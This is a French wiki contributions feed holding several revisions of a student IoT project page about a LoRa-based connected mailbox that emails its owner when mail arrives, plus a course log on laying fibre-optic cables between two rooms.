<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://projets-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ldelecro</id>
		<title>Wiki de Projets IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://projets-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ldelecro"/>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php/Sp%C3%A9cial:Contributions/Ldelecro"/>
		<updated>2026-05-14T09:17:55Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:PosterGr2.png&amp;diff=37313</id>
		<title>Fichier:PosterGr2.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:PosterGr2.png&amp;diff=37313"/>
				<updated>2017-01-17T13:08:12Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : a téléversé une nouvelle version de « Fichier:PosterGr2.png »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:PosterGr2.png&amp;diff=37312</id>
		<title>Fichier:PosterGr2.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:PosterGr2.png&amp;diff=37312"/>
				<updated>2017-01-17T13:01:15Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37311</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37311"/>
				<updated>2017-01-17T13:00:59Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Poster */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:bal.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
* Finalisation du code pour la communication entre modules LoRa&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Branchement du capteur de luminosité&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 4===&lt;br /&gt;
* Optimisation du code des modules LoRa et du code C sur la raspberry&lt;br /&gt;
* montage final du prototype&lt;br /&gt;
* Suite de l'édition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 5===&lt;br /&gt;
* Automatisation du processus sur la Raspberry&lt;br /&gt;
* Connexion de la Raspberry en Wifi automatiquement au démarrage sur un téléphone en partage de connexion pour accès internet durant la démo&lt;br /&gt;
* Développement d'une petite application Android analogue à l'interface web, pour pouvoir régler l'adresse et le corps du message depuis son smartphone&lt;br /&gt;
&lt;br /&gt;
==Poster==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:PosterGr2.png]]&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37242</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37242"/>
				<updated>2017-01-12T16:00:30Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Suivi de l'avancement du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
* Finalisation du code pour la communication entre Arduinos&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37082</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37082"/>
				<updated>2017-01-09T12:27:27Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Séance 2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[acheté]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[acheté]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37081</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37081"/>
				<updated>2017-01-09T12:26:34Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Matériel nécessaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[acheté]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[acheté]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=37069</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=37069"/>
				<updated>2017-01-08T19:54:24Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Références */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
